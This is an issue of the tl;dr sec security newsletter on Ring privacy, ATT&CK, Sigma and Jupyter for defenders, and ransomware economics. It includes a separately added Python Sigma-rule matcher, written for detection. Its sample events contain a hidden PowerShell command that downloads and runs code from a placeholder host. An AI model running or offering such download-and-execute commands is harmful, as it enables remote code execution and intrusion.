[tl;dr sec] #18 - "GitHubification" of Infosec, Ring Privacy, Ransomware Economics
Blue teams can become highly leveraged by sharing knowledge effectively, Ring's partnerships with the police, viewing ransomware through an economic lens.
This week I’m working remotely from the Midwest, visiting my family for the holidays. There’s this weird fluffy white stuff on the ground. Still trying to figure out what it is 🤔
But really, I remember when I first moved to California, and saw people wearing their warmest winter coats when it was 55 degrees out; meanwhile, I was wearing a sweatshirt and thinking how nice the weather was. I felt like I had super powers! Now I’m the same, sigh.
Moved to tldrsec.com
You may have noticed that our blog has moved from programanalys.is to tldrsec.com. It turns out that’s easier to tell people than, “So it’s ‘program analysis’ but the .is is the domain. Wait, no, the period is there. Oh, you’ve almost got it but…”
🎄 Break for the Holidays
As next week is Christmas and the following is New Years, I probably won’t be sending out another tl;dr sec for 1-2 weeks. Happy holidays! I hope you have some time to relax with your loved ones and eat some good food.
📜 In this newsletter...
Privacy: Ring's partnerships with the police, livestreamed podcast of hacked Rings, Signal groups, Telegram surveillance bot
Talks: BlackHat USA 2019 talks posted, Malware Unicorn's BlackHat EU keynote, extending Ghidra, deobfuscating an Android botnet
Githubification of InfoSec: Blue teams can become highly leveraged by sharing knowledge via things like the MITRE ATT&CK™ framework, detection definitions in Sigma rules, and repeatable analyses written in Jupyter notebooks
Misc: security.txt progresses, legal docs for physical pen tests, example CISO application slide deck
Ransomware: Towards an Economic Equilibrium: on the economics of ransomware and its similarities to kidnapping
Tools: Facebook's Python static analysis tool finds its first CVE, an IPython notebook to explore ZAP's API and scripting functions, omnibot - a Slack proxy and bot framework
The article hypothesizes that Amazon may have bought Ring to help reduce package theft (which cuts into margins) and because of its existing relationships with law enforcement.
Inside the Podcast that Hacks Ring Camera Owners Live on Air
“The NulledCast is a podcast livestreamed to Discord. It’s a show in which hackers take over people’s Ring and Nest smarthome cameras and use their speakers to talk to and harass their unsuspecting owners.” It’s not really hacking; it’s credential stuffing: software that tries previously leaked email address and password combinations against Ring accounts at scale.
Technology Preview: Signal Private Group System
An interesting discussion of the technical challenges in implementing groups in Signal in a way that maintains various strong privacy guarantees.
Informer: A Telegram Mass Surveillance Bot in Python
A bot library that allows you to masquerade as multiple real users on Telegram and spy on 500+ Telegram channels per account. Details are logged to a MySQL database, a private Google Sheet and your own private channel for analysis.
One cool thing about working at NCC Group is being able to work with colleagues who are world-class in specific areas, like cryptography. When I asked them which secure messaging app best respects my privacy / has the most desirable cryptographic properties, they’ve generally given me the unanimous answer: Signal.
The BlackHat USA 2019 videos have been posted.
Blue to Red: Traversing the Spectrum
BlackHat EU 2019 keynote by Malware Unicorn. She describes how security fundamentals have been critical to her career success, from being a forensic technician in government, to a malware researcher in the private sector, and currently as an offensive engineer on the red team at Facebook.
A talk from an 8+ year Ghidra developer on extending Ghidra with scripts and plugins.
By John Lambert, Distinguished Engineer, Microsoft Threat Intelligence Center.
“A community-based approach in infosec can speed learning for defenders. Attack knowledge curated in the MITRE ATT&CK™ framework, detection definitions expressed in Sigma rules, and repeatable analysis written in Jupyter notebooks form a stackable set of practices. They connect knowledge to analytics to analysis.
If organizations were to contribute and share their unique expertise using these frameworks, and organizations were in this way to build on the expertise of others, defenders in every organization would benefit from the best defense in any organization.”
The MITRE ATT&CK™ framework gives us a curated taxonomy of attack tactics and techniques used in the wild.
“Various threat actors are described by the ATT&CK techniques they use. Defenders can then evaluate their defensive controls against the subset of techniques used by the specific threat actors they face.”
Sigma (source code) provides a generic, vendor-agnostic way to write detections on logs. It comes with a set of converters that translate the Sigma language into the query languages of popular tools, including Splunk, Elasticsearch, QRadar, and others (uncoder.io can be used to do this easily).
Researchers and people writing security advisories can share Sigma rules to self-document concrete logic for detecting attacker techniques.
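To make the Sigma idea concrete, here is an added example that is not code from the newsletter or from the Sigma project: a constructed rule in Sigma's structure (written as a dict rather than YAML so nothing beyond the standard library is needed), tagged with its ATT&CK technique, evaluated by a minimal matcher over constructed Sysmon-style process-creation events. The real converters turn such rules into Splunk/Elasticsearch queries; this matcher only implements the `contains`/`endswith` modifiers, OR-lists, and a flat and/or/not condition, which is enough to show how one rule both fires on the suspicious event and is suppressed by its filter.

```python
# Constructed rule in Sigma's structure (field|modifier keys, list values, named selections).
RULE = {
    "title": "PowerShell download cradle (constructed example)",
    "tags": ["attack.execution", "attack.t1059.001"],  # MITRE ATT&CK tactic / technique tags
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],  # list = OR
        },
        "filter": {"ParentImage|endswith": "\\updater.exe"},  # known-good parent process
        "condition": "selection and not filter",
    },
}

def _field_matches(event, key, expected):
    """Sigma field semantics: 'field|modifier', list values are OR-ed, case-insensitive."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for cand in (expected if isinstance(expected, list) else [expected]):
        cand = str(cand).lower()
        if modifier == "contains" and cand in value: return True
        if modifier == "endswith" and value.endswith(cand): return True
        if modifier == "" and value == cand: return True
    return False

def _eval_condition(cond, hits):
    """'not' binds tightest, then 'and', then 'or'; no parentheses (enough for this rule)."""
    term = lambda tok: not hits[tok[4:]] if tok.startswith("not ") else hits[tok]
    return any(all(term(t.strip()) for t in conj.split(" and ")) for conj in cond.split(" or "))

def rule_matches(rule, event):
    det = rule["detection"]
    hits = {name: all(_field_matches(event, k, v) for k, v in sel.items())
            for name, sel in det.items() if name != "condition"}
    return _eval_condition(det["condition"], hits)

# Constructed process-creation events (Sysmon-style field names), not real telemetry.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://example.invalid/update.json",
     "ParentImage": "C:\\Program Files\\Vendor\\updater.exe"},   # suppressed by the filter
    {"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe"},
]

def matching_indices(rule=RULE, events=EVENTS):
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]
```

Running `matching_indices()` returns only the index of the first event: the updater-spawned PowerShell is excluded by the filter and notepad never satisfies the selection.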
Jupyter notebooks can be shared that make investigation processes repeatable and document how relevant data was enriched.
“When someone else downloads a notebook, they can follow along on the analysis, or they can apply the methodology to their data by re-running it. This ability to execute the analysis against similar data is a powerful concept that allows one to encapsulate expertise. Now any publisher of a notebook is not only a teacher, but also a virtual team member.”
Relatedly, in tl;dr sec #11 we saw Twilio release SOCless, their serverless framework for running SecOps runbooks at scale, and Dropbox discussed their automation around threat detection and IR built on Jupyter notebooks.
Roberto Rodriguez has a blog series on using Jupyter notebooks for threat hunting, here’s a blog post on using the ThreatHunterPlaybook Project + Mordor (pre-recorded security event datasets), and Netscylla also has a blog that walks through one of the author’s notebooks for use in an incident response scenario.
security.txt is making its way through IETF
“When security vulnerabilities are discovered by independent security researchers, they often lack the channels to report them properly. As a result, security vulnerabilities may be left unreported. This document defines a format (“security.txt”) to help organizations describe the process for security researchers to follow in order to report security vulnerabilities.” (full text of spec)
TrustedSec released their legal documentation for physical security assessments. I think this is awesome, and will hopefully help prevent future cases like the two Coalfire employees who were hit with felony burglary accusations for testing the Iowa State Judicial Branch, which they were hired to do.
Blog post by Kelly Shortridge on “how the economics of physical ransom translate to digital ransom, and how we as an industry might want to reconceive our current approaches to considering and dealing with ransomware – and the criminals who run ransomware campaigns.”
In short, kidnappers, pirates, and ransomware authors want the situation to “go well” for the victim, because if they get a reputation for bad outcomes, people won’t pay.
Since this sort of illegal activity is inevitable, we want to have “good” attackers, who do not kill their victims and who allow safe recovery of data.
Kidnapping insurance and cyber insurance help incentivize skilled attackers who keep their promises.
Pysa, the Python static analysis tool by Facebook, found its first CVE, an open redirect in the thumbnail view of Zulip, an open source team chat application. Pysa’s docs have also been updated with more info on increasing its coverage.
(Lyft) Announcing omnibot: a Slack proxy and Slack bot framework
Over time, Slack has added a number of APIs for writing integrations. Depending on what functionality you want (e.g. slash commands, interactive components), you may have to use different sets of APIs, which can force you to largely rewrite a bot if you made the wrong choice when you started.
✉️ Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏
Thanks for reading!